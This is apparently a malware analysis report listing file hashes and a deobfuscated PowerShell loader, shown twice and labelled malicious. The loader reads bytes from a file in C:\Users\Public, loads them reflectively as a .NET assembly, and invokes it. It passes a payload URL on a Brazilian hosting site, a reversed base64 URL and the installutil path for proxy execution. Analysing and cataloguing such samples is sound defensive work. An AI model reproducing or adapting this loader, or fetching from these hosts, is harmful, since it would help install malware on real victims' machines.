| Hash | Hash Value |
|---|---|
| MD5 | 01ac0348a623c7f4c3bed2834d528b8b |
| Sha1 | f7c00dac9182648f683bde97db550af365837dbe |
| Sha256 | a10ef9151e0dd03800f4ccff964a1b8d2583a2d10a82a1b6a537eaf0459f612f |
| Sha384 | 1427a36c5c1f5ce63dd7ed20076294eaa4c889d99d7f1ff7fd3d697c630d39c94921f3e7559757098bc2d3f3ae5facd0 |
| Sha512 | 95d0e962fc11810775d4b7d962dcc8908cc8e8063f70f8cdc6d78820ea664c84967df7e73719ba7e922079f6573783c5128dd3f492ef81f64792ee248b2c6d5f |
| SSDeep | 48:pAlbYyQgQaAAzccJRLRzSkdK4Oggz4J5MLLzQw:pQbYyQgQadzccDFvK4mzjLLkw |
| TLSH | CA319C506BF69608B2B35E05A5FF65924C3B7A7E6E79CA0D0054C14E1BB1A48CC77F32 |

| Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeYes" $zgHoW = "%base64%dHh0LmxiL21vYy5haXJ1b3J0c2FjLm9緒b2xhdGFjLy86c3B0dGg=" $zgHoW = ($zgHoW -replace @("緒", "n")) $cTFzN = "C:\Users\Public\kpfdb.txt" $djrbd = (Get-Content -Path $cTFzN -Encoding "UTF8") $djrbd -replace @(" ", "") [byte[]] $rfljj = [List`1]::"new"() $rfljj = ($djrbd -split "," | ForEach-Object [byte] ($_."Trim"())) $XFTCp = [Assembly]::"Load"($rfljj) $rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1") $XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($tZziq, [object[]] (@($zgHoW, "C:\Users\Public\cxzkw的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ))) |

| Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeYes" $zgHoW = "%base64%dHh0LmxiL21vYy5haXJ1b3J0c2FjLm9緒b2xhdGFjLy86c3B0dGg=" $zgHoW = ($zgHoW -replace @("緒", "n")) $cTFzN = "C:\Users\Public\kpfdb.txt" $djrbd = (Get-Content -Path $cTFzN -Encoding "UTF8") $djrbd -replace @(" ", "") [byte[]] $rfljj = [List`1]::"new"() $rfljj = ($djrbd -split "," | ForEach-Object [byte] ($_."Trim"())) $XFTCp = [Assembly]::"Load"($rfljj) $rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1") $XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($tZziq, [object[]] (@($zgHoW, "C:\Users\Public\cxzkw的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ))) Malicious |
01ac0348a623c7f4c3bed2834d528b8b |